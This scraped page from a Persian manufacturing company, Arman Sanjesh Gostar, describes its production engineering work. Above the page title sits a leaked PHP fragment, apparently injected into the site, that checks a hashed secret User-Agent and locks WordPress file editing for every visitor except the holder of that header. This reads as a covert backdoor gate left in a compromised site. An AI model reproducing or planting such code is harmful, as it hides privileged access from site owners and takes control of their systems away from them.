if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } ob_start(); ?> ساخت و تولید | آرمان سنجش گستر

ساخت و تولید

در شـرکت آرمـان سنجـش گستر مهندسان ساخت و تولید روش‌های ساخت فرآورده را طراحی می‌کنند. آن‌ها بطور کامل بر روی روش‌های متنوع تولید مانند برش فلزات، شـکل‌دهی، مونتـاژ، بازرسـی و تـست مسلـط هستند تا بتـوانند رونـد تـولید را طرح‌ریزی کنند و برای یافتن بهترین شرایط کارکرد تحقیق نمایند. مهندسین ساخت و تولید شـرکت آرمـان سنجـش گستـر ممکـن است ابـزارها و ماشیـن‌هـای مخصـوصی طـراحی و بـرای بـهبـود بخشیدن به روش‌های تـولید کنـونی نـو‌آوری‌هایی به خـرج دهند. آنها استانـداردهای تـولید قـطعه را تـعیین و مراحل تولید را هماهنگ می‌کنند تا روند همواری را از زمان دریافت مواد اولیه تا صادر کردن قطعات ساخته شده تضمین نمایند. مـهندسین زبـردست مجموعه آرمان سنجش گستر باید تجهیزات، نیروی انسانی و امکانات را در یک سیستم که فرآورده‌های با کیفیت را بطور کارآمد تولید می‌کند، بخوبی متحد کنند.